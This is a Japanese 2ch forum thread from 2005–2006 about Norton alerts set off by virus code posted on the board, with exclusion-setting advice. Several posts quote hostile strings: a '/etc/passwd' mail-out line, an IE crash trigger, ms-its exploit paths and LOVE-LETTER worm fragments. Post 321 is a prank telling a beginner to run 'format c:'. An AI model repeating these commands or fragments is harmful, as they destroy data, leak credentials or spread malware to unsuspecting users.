- 1 名前:他のアンチウィルスソフトが反応する場合もあります mailto:sage [05/03/01 01:58:58 ID:???]
- 只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
前スレ
ノートンがvbsウィルスのソースに誤反応
pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
pc5.2ch.net/test/read.cgi/pcqa/1033948204/
テンプレ>>1-10あたり
- 321 名前:ひよこ名無しさん mailto:sage [2005/10/20(木) 22:28:16 ID:???]
- @スタート(タスクバーの左端にあるボタン)
Aすべてのプログラム
Bアクセサリ
CDOSプロンプト(コマンドプロンプト)を起動
Dformat c:と入力
EEnter
F再起動
Gヒャッホウ
これでおk
実行する際にはあくまで自己責任にてお願い致します。
- 322 名前:ひよこ名無しさん mailto:sage [2005/10/20(木) 23:07:48 ID:???]
- >>320
お願いします
- 323 名前:名無しさん@お腹いぱーい。 mailto:sage [2005/10/20(木) 23:36:29 ID:???]
- >>320
ttp://makimo.to/2ch/pc2_software/1060/1060103207.html#11
仕様が大きく変わってない限りそれでいいと思います。
壷のログフォルダの確認はこちらで聞いてください。
【高速?】2ちゃんねるターボ 10壷目
pc7.2ch.net/test/read.cgi/software/1125562891/
- 324 名前:ひよこ名無しさん mailto:sage [2005/10/21(金) 11:31:23 ID:???]
- >>323
ありがとうございます
それでやってみます
- 325 名前:ひよこ名無しさん [2005/10/25(火) 15:33:17 ID:fojy96h8]
- あげ
- 326 名前:ひよこ名無しさん mailto:sage [2005/10/25(火) 23:33:02 ID:???]
- >>321
おぃおぃ...
- 327 名前:ひよこ名無しさん mailto:sage [2005/10/26(水) 09:24:15 ID:???]
- >>321
よし試してみよう
ヒャッホウ!
- 328 名前:ひよこ名無しさん mailto:sage [2005/10/27(木) 13:44:50 ID:???]
- Norton Anti Virusのオプション
手動スキャンとAuto-Protectで2chのログを除外指定したのですが
オプション→脅威カテゴリ→除外って所は関係ないのでしょうか?
- 329 名前:ひよこ名無しさん mailto:sage [2005/10/27(木) 17:17:11 ID:???]
- >>328
そこはスパイウェアやアドウェアの検出に関する設定なので、2chのログには関係ない。
- 330 名前:ひよこ名無しさん mailto:sage [2005/10/27(木) 20:07:34 ID:???]
- >>329
サンクス!
- 331 名前:ひよこ名無しさん mailto:sage [2005/10/29(土) 01:10:38 ID:???]
- NIS2005を使用しています
Opera8.5で>>2にあるテスト用のttp://www.eicar.org/download/eicar.com.txtを踏んでみたのですがNAVが反応しません。
これはAutoProtectが正常に働いていないということなのでしょうか。
試しにローカルにDLしてみてスキャンをかけてみると、ウィルスだと反応して削除します。
- 332 名前:ひよこ名無しさん mailto:sage [2005/10/29(土) 11:43:26 ID:???]
- >>331ですが、解決できました。
「オプション」→「NortonAntiVirus」→「AutoProtect」にて、
「SmartScanを使ってファイルをスキャン」にチェックが入っていたのを「完全ファイルスキャン」に変更したら反応しました。
拡張子.txtがAutoProtectの対象になってなかったってことなんですね……。失礼しました。
- 333 名前:ひよこ名無しさん mailto:sage [2005/10/31(月) 21:20:51 ID:???]
- 反応しちゃった場合は放置しといても大丈夫なの?
- 334 名前:ひよこ名無しさん mailto:sage [2005/11/01(火) 03:53:50 ID:???]
- 勝手に修復したり隔離したりする設定になってると、困ることもある。特に2ch専用ブラウザ使ってる場合。
- 335 名前:ひよこ名無しさん mailto:sage [2005/11/05(土) 23:27:57 ID:???]
- これか
cat /etc/passwd | mail nobody
- 336 名前:ひよこ名無しさん mailto:sage [2005/11/06(日) 10:55:05 ID:???]
- 何もノートンが誤反応しているわけではありません。
VBScriptやJavaScriptの拡張子のファイルに反応すべきなのを、
どの拡張子にでも誇大反応するだけです。
WindowsUpdateは、常に最新の状態に心がける事。
SunのJavaをインストールしている人は、これも最新版に更新しておく事。
RealPlayerやAdobe Readerなども最新にしておかないと、ウィルスに感染しますよ。
これらを心がけて最新状態にしてあれば、ウィルス反応があってもシステムにはもう感染はしません。
過去のWindowsのセキュリティホールを攻撃するアクティブスクリプトに反応しているだけですから、無視して結構です。
ページをプレビューしただけで反応するようなウィルスは、ほとんど全部がもはや検出する必要がないものです。
セキュリティベンダーなどに騙されてはいけませんよ。
- 337 名前:ひよこ名無しさん mailto:sage [2005/11/13(日) 13:25:01 ID:???]
- cenの部屋の管理人さんへ、
誤反応スクリプト無効化ソフト vicptdel ですが、
VBS Freelink.Bにも対応してもらえないでしょうか?
またサイトトップには、updateの表示だけでなく、update日付やVerも
記載していただけたら嬉しいです。ご検討よろしくお願いします。
cenの部屋
www.geocities.jp/cen_hp/
- 338 名前:ひよこ名無しさん mailto:sage [2005/11/13(日) 13:39:48 ID:???]
- ラウンジ開いたらブラッドハウンドに感染したみたいなんですが解決法がいまいちよく解りません…
- 339 名前:ひよこ名無しさん mailto:sage [2005/11/14(月) 11:37:29 ID:???]
- Vipのスレ一覧でも反応するっぽいけど誤検出なんだろねえ…
- 340 名前:ひよこ名無しさん mailto:sage [2005/11/14(月) 16:31:14 ID:???]
- うん
- 341 名前:ひよこ名無しさん mailto:sage [2005/11/17(木) 11:59:50 ID:???]
- Bloodhound.Exploit.6ってなんてコードで引っ掛かってるですか?
NGワード指定したいんで教えてください
- 342 名前:ひよこ名無しさん mailto:sage [2005/11/17(木) 13:38:30 ID:???]
- 専用ブラウザでNGワード指定しても2chの鯖から取得して保存されるデータは同じなので無意味。
Proxomitronとかでフィルタリングするなら別だが。
それより素直にノートンの除外設定すべき。
- 343 名前:cen ◆Pm9xOTJuM. mailto:sage [2005/11/18(金) 00:43:33 ID:???]
- >>337
ご意見ありがとうです。
VBS.Freelink.Bですが、パターンは1つですが対応はしていますよ。
対応していないパターンかもしれないので、もしよかったら誤反応した
スレを教えて頂けないでしょうか。
そうですね。日付とバージョンはまた書いときますです。
- 344 名前:ひよこ名無しさん mailto:ms-its:mhtml:file://c:\ sage [2005/11/20(日) 16:39:13 ID:???]
- ほう
- 345 名前:ひよこ名無しさん mailto:sage [2005/11/20(日) 21:02:09 ID:???]
- >>343
Winny一般コミック part144
tmp4.2ch.net/test/read.cgi/download/1110070134/5
上記のレスです。
dat落ちしてますので、以下を参照してください。
makimo.to/2ch/tmp4_download/1110/1110070134.html
- 346 名前:cen ◆Pm9xOTJuM. mailto:sage [2005/11/20(日) 22:07:13 ID:???]
- >>345
見てみました。そこの>>5からdatファイルを作って試しましたが、
無効化して、ウイルス対策ソフトでスキャンしても反応しませんでした
よ。
あと、このソフトで対応しているのは、2chにあるdatファイルのみです。
例:pc7.2ch.net/pcqa/dat/xxxxxxxxxx.dat
壺のdatやhtmlには対応していないです。
- 347 名前:cen ◆Pm9xOTJuM. mailto:sage [2005/11/22(火) 02:12:37 ID:???]
- >>17 のソフトの紹介ページを更新しましたです。
www.geocities.jp/cen_hp/program3.html
- 348 名前:ひよこ名無しさん [2005/11/25(金) 13:41:31 ID:73+tCVDU]
- ウィルスが検出されんだけどどうすりゃいいの?
- 349 名前:ひよこ名無しさん mailto:sage [2005/11/25(金) 14:39:57 ID:???]
- 恐れず全力で戦え
- 350 名前:ひよこ名無しさん mailto:age [2005/11/25(金) 17:03:37 ID:???]
- 保守
- 351 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 08:08:31 ID:???]
- game10.2ch.net/test/read.cgi/handygame/1133109700/
このスレを読み込もうとすると、ノートン先生が
206.223.150.115からのアタックを検出して
途中までしか読み込めなくなります。
手動スキャンとAuto-Protectでlogフォルダの
除外の設定はしたんだけどまだダメっぽい。
OSはWinXP, ノートン先生はNAV2003, 専ブラはLive2chです。
たっけてー。
- 352 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 08:36:32 ID:???]
- <body onload=window()>
- 353 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 08:42:51 ID:???]
- >>351
NAVですか? インターネットセキュリティじゃなくて?
スレみたら、Nortonスレで昨日話題になったonloadなんちゃらのトラップを確認しました。
これはフォルダの除外設定では対応できなかったと思います。
NIS使ってるなら、NISを無効にして再取得を。
>>352
あーバカが貼りやがったよorz
- 354 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 08:54:07 ID:???]
- >>353
あ、NISでした。勘違いsorry。
無効→再取得してトラップっぽいレス(>>499と>>543)
2個あぼ〜んにしました。
これだけで問題ないですか?
- 355 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 09:01:10 ID:???]
- >>354
あぼーんの意味はありません。一度取得すれば問題ありません。
ただし、新規に貼られたら、NGワードに指定してあぼーん(または透明あぼーん)しても引っかかります。
現状での対処法としては
○引っかかったときにNISを切って再取得をする対処療法
○侵入検知の設定で、AutoBlockの除外項目に2chの鯖を登録する(穴をあけることになるので微妙ですが)
くらいでしょうか。
Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
Live2chでそれをやるのはちょっと手間なようです。
Live2chのスレでも少し話題になってますので、そちらも追っておくことをお勧めします。
- 356 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 10:58:13 ID:???]
- >>355
ご丁寧にどうもありがとうございます。
一度取得してしまえばそれでオワリなんですね。
Live2chのスレ探して見てみます。
- 357 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 14:10:20 ID:???]
- >>355
>Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
誘導もしくは詳しくお願いします。
- 358 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 14:42:24 ID:???]
- >>357
<ここ数日2chを騒がせている侵入検知トラップの対策法>
症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。
対策:上に行くほどおすすめ
@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ
AReplace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない
Bよくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。
ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
今回のはNAVではなくNIS管轄のトラップです
Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ノートン】インターネットセキュリティ Ver.77【2006】
pc8.2ch.net/test/read.cgi/sec/1132279196/
- 359 名前:ひよこ名無しさん mailto:<body onload=window()> [2005/11/28(月) 14:57:54 ID:???]
- (笑)
- 360 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 17:12:55 ID:???]
- www.computerterrorism.com/research/ie/poc.htm#
www.computerterrorism.com/research/ie/fillmem.htm
www.computerterrorism.com/research/ie/bug.htm
- 361 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 17:30:40 ID:???]
- >>358
それガセらしいじゃないか・・・
。゚(゚´Д`゚)゜。ウァァァン
- 362 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 17:33:17 ID:???]
- >>361
あーはいはい。
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
- 363 名前:eip = eip + unescape("%u7030%u4300") mailto:"<body onload=window();>" [2005/11/28(月) 19:44:46 ID:???]
- www.computerterrorism.com/research/ie/poc.htm#
www.computerterrorism.com/research/ie/fillmem.htm
www.computerterrorism.com/research/ie/bug.htm
- 364 名前:ひよこ名無しさん mailto:sage [2005/11/28(月) 20:55:42 ID:???]
- ms-its:mhtml:file://c:\
- 365 名前:名無しさん@お腹いぱーい。 mailto:sage [2005/11/29(火) 00:32:03 ID:??? BE:2515744-##]
- とりあえずKnowledge Base 経由で>>352のソースをツマンテックに送って対応を催促しますた。
- 366 名前:ひよこ名無しさん mailto:sage [2005/11/29(火) 00:54:38 ID:???]
- 馬鹿だなノートン。
- 367 名前:ひよこ名無しさん mailto:sage [2005/11/29(火) 10:34:17 ID:???]
- ノートンの誤作動対策したら、
スクリプトを仕組んでるスレみると、変に改行されてしまう(\r\n\r\n)のはなぜ?
- 368 名前:名無しさん@お腹いぱーい。 mailto:sage [2005/11/29(火) 12:44:31 ID:??? BE:1415333-##]
- >>367
>>362の設定ですか?
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。
- 369 名前:cen ◆Pm9xOTJuM. mailto:sage [2005/11/30(水) 00:10:23 ID:???]
- >>352について、役に立つかは知らないですが、>>17のソフトにて
対応させてみました。
www.geocities.jp/cen_hp/program3.html
- 370 名前:ひよこ名無しさん [2005/12/11(日) 18:48:05 ID:J4cBBOMR]
- 【アメリカ】全米各地で中国系中心に「アジア人」生徒へのいじめが増加…問題の根深く
news19.2ch.net/test/read.cgi/newsplus/1134279288/
- 371 名前:名無しさん@お腹いぱーい。 mailto:sage [2005/12/12(月) 00:37:26 ID:??? BE:1257942-##]
- 現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。
2chNIS問題まとめページ
mickey.mirv.net/2chnis.html
ノートン応急対策
info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
ansitu.xrea.jp/guidance/?NortonInternetSecurity#Emergency_measures ansitu.xrea.jp/guidance/?Trap#Emergency_measures
wiki.livedoor.jp/kizyo1234/d/%a5%ce%a1%bc%a5%c8%a5%f3%b4%d8%cf%a2
この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。
アンチウイルス(NAV)の設定は>>1
ansitu.xrea.jp/guidance/?Trap#NortonTrap
- 372 名前:ひよこ名無しさん [2005/12/12(月) 23:03:17 ID:TJ/QcL4e]
- <body onload=windowあ()> ms-its:mhtml:fileあ://c:\
↑ひらがな抜いて書き込みすると誤作動します。
誤作動うざい。
- 373 名前:ひよこ名無しさん mailto:sage [2005/12/12(月) 23:14:43 ID:???]
- doredore,
<body onload=window()> ms-its:mhtml:file://c:\
- 374 名前:ひよこ名無しさん mailto:sage [2005/12/13(火) 00:32:45 ID:???]
- i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l
- 375 名前:ひよこ名無しさん [2005/12/14(水) 08:34:01 ID:9z0oGE5T BE:229219294-#]
- てt
- 376 名前:ひよこ名無しさん mailto:sage [2005/12/16(金) 07:08:09 ID:???]
- vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
ttp://tmp5.2ch.net/test/read.cgi/download/1133670032/11
ttp://makimo.to/2ch/tmp5_download/1133/1133670032.html#11
cenさんもしよろしければ、対応お願いします。
またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか?
caXt /etc/paXsswd | mail noXbody (Xを削除)
- 377 名前:cen ◆Pm9xOTJuM. mailto:sage [2005/12/18(日) 00:49:25 ID:???]
- >>376
そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。
あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。
- 378 名前:ひよこ名無しさん [2005/12/22(木) 17:14:31 ID:Y2IitcnV]
- ノートンインターネット2006を入れたのですが、初心者の質問の板が
見れたり見れなかったりします。見れてもウィルス反応がでてしまう
のですが、2006の設定を教えて下さい。
お願いします。
- 379 名前:ひよこ名無しさん mailto:sage [2005/12/22(木) 17:23:38 ID:???]
- >>378
ノートンを切る
それだけ
- 380 名前:ひよこ名無しさん [2005/12/22(木) 19:21:21 ID:Z1b4rF6D]
- NIS2006を入れたんですが、誤反応しません。
設定が悪くセキュリティが甘くなってるのでしょうか?
- 381 名前:ひよこ名無しさん mailto:sage [2005/12/22(木) 19:37:59 ID:???]
- >>380
割れてます。
- 382 名前:ひよこ名無しさん mailto:380 [2005/12/22(木) 20:22:37 ID:???]
- >>381
普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか?
- 383 名前:ひよこ名無しさん mailto:sage [2005/12/22(木) 20:23:54 ID:???]
- >>382
(((((((( ;゚Д゚)))))))ガクガクブルブル
- 384 名前:ひよこ名無しさん mailto:age [2005/12/23(金) 00:52:52 ID:???]
- .l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人 \ !!大激怒!! // U :::U:
ぶっ壊れ(__) \ !!!!! / // ___ \ :::
たお! (__) \∧∧∧∧/ | | | U ::::
(`Д´#) < ぶ パ > |U | | ::U:
_| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....::::
/旦|――||// /| < 壊 コ > ヽ .....:::::::::
─────────< れ ン >──────────
< _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬
(y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___
⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
- 385 名前:ひよこ名無しさん [2005/12/26(月) 23:44:59 ID:JAAmlww2]
- life7.2ch.net/test/read.cgi/kankon/1134376159/
このスレにアクセスしたらウイルスが検出されます。
どうしたらいいですか?
- 386 名前:ひよこ名無しさん mailto:sage [2005/12/26(月) 23:46:05 ID:???]
- >>385
このスレを一通り読んでから質問しろよ情報乞食
- 387 名前:ひよこ名無しさん mailto:sage [2005/12/26(月) 23:48:53 ID:???]
- >>385
何でそうやってすぐに聞こうとするの?
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに
- 388 名前:ひよこ名無しさん [2005/12/26(月) 23:54:34 ID:TT8kYPqv]
- ttp://210.150.222.13/cgi-bin/imgbbs01/imgboard.cgi
の掲示板に貼られている空白?の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか?
怖いので今日中に再フォーマットするつもりですが・・・
- 389 名前:ひよこ名無しさん mailto:sage [2005/12/26(月) 23:58:53 ID:???]
- >>388
で、何故このスレで聞こうと思ったの?
- 390 名前:ひよこ名無しさん mailto:sage [2005/12/26(月) 23:59:45 ID:???]
- 自称PC初心者はスレタイも読めない日本語初心者…っと。
- 391 名前:ひよこ名無しさん [2005/12/27(火) 00:04:42 ID:TZFt/HNg]
- >>389
あ、今、別のスレで教えてもらえました
すいませんm(__)m
- 392 名前:ひよこ名無しさん mailto:sage [2005/12/27(火) 01:32:52 ID:???]
- >>388
踏んだ 踏んだ どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない
- 393 名前:ひよこ名無しさん mailto:age [2006/01/05(木) 11:05:53 ID:???]
- じいさんのためにage
- 394 名前:ひよこ名無しさん mailto:sage [2006/01/09(月) 23:41:35 ID:???]
- バージョン 】 1.12
【 スキン 】 default
【 IE 】 6.0.2900.2180
【 Windows 】 Windows XP Home Edition (Service Pack 2)
【 不具合 】 生活板がどのスレッドも見れません。
【詳しい内容 】 ボードデータの更新をしても、スレッドの更新をしても、再インストールしても
見れません。ちなみに専用ブラウザを使用しなくても見れなくなってしまいました。
何が原因なのでしょうか…?
- 395 名前:ひよこ名無しさん mailto:age [2006/01/10(火) 21:00:00 ID:???]
- >>394
ここに来たってことはノートン入れてるんでしょ?
原因はノートン
ついでに保守age
- 396 名前:ひよこ名無しさん mailto:sage [2006/01/11(水) 08:57:15 ID:???]
- ms-its:mhtml:file://c:\
- 397 名前:ひよこ名無しさん mailto:sega [2006/01/15(日) 20:20:52 ID:???]
- 定期age
- 398 名前:ひよこ名無しさん mailto:sage [2006/01/22(日) 05:06:59 ID:???]
- すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■xp■NIS2004■>>1-9は読みました
>>51>>56さんとややケースが似てるんですが…
最近ノートン2004を再インスコしたので、前と同じ方法(>>1)で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
pc7.2ch.net/test/read.cgi/pcqa/1109609938/(このスレです…)
pc8.2ch.net/test/read.cgi/hp/1135924815/
警告メッセージのスクショ↓
ttp://vipquality.orz.hm/imageup/file/onz27560.jpg(このスレのです。これが2回でます)
ttp://vipquality.orz.hm/imageup/file/onz27561.jpg(下のスレのです)
で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
ttp://www.geocities.jp/cen_hp/program3.html#use_____
やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて〜(つД`;)
- 399 名前:ひよこ名無しさん [2006/01/22(日) 05:20:54 ID:qJbbwLqx]
- トラックバック:etc3.2ch.net/test/read.cgi/qa/1137857523/
- 400 名前:ぼるじょあ ◆yBEncckFOU mailto:sage [2006/01/22(日) 05:37:48 ID:???]
- >>398
(・3・) エェー そのソフトはdatは対策できるけど、subject.txtは
対策できないYO
- 401 名前:名無しさん@お腹いぱーい。 mailto:sage [2006/01/22(日) 19:21:57 ID:???]
- >>398
今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。
該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。
Janeの場合
Jane2ch\Logs
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt
ε三(; ・∀・)鯖マデオツカイの場合
otsukai\result.dat
詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。
- 402 名前:名無しさん@お腹いぱーい。 mailto:sage [2006/01/22(日) 19:46:59 ID:???]
- >>401補足
増えた項目の内、
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。
- 403 名前:ひよこ名無しさん [2006/01/27(金) 17:56:55 ID:SL6Rf0+0]
- Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの?
- 404 名前:ひよこ名無しさん [2006/01/28(土) 02:19:43 ID:W65BflbM]
- すみません、質問です。
昨日から携帯PHS板を見ていると、ノートンで何度も警告が出て、
WScript.KakWormってやつなんですけど、これは
「kak.hta';ken=wd+'START」ってスレタイがあるせいなのでしょうか?
- 405 名前:404 mailto:sage [2006/01/28(土) 02:27:13 ID:???]
- すみません、テンプレ見ましたm(_ _)m
- 406 名前:名無しさん@お腹いぱーい。 mailto:sage [2006/01/28(土) 20:16:04 ID:???]
- >>403
Logフォルダを除外に指定してね。
- 407 名前:ひよこ名無しさん [2006/01/31(火) 10:00:47 ID:nkcqfLth]
- 先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m
- 408 名前:ひよこ名無しさん mailto:sage [2006/01/31(火) 10:02:30 ID:???]
- >>407
誘導されたらそう書け
それと普通>>1から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ
- 409 名前:ひよこ名無しさん mailto:cat /etc/passwd | mail nobody [2006/01/31(火) 10:03:47 ID:???]
- これかな?
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
<body onload=window()>
- 410 名前:ひよこ名無しさん [2006/01/31(火) 10:08:09 ID:nkcqfLth]
- >>408
はぁ?おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ
- 411 名前:ひよこ名無しさん mailto:sage [2006/01/31(火) 10:10:37 ID:???]
- 言っておくけど、回答者はどこも共通だから
- 412 名前:ひよこ名無しさん mailto:sage [2006/01/31(火) 10:11:13 ID:???]
- i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l
- 413 名前:ひよこ名無しさん mailto:sage [2006/01/31(火) 10:12:28 ID:???]
- >>410
お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ
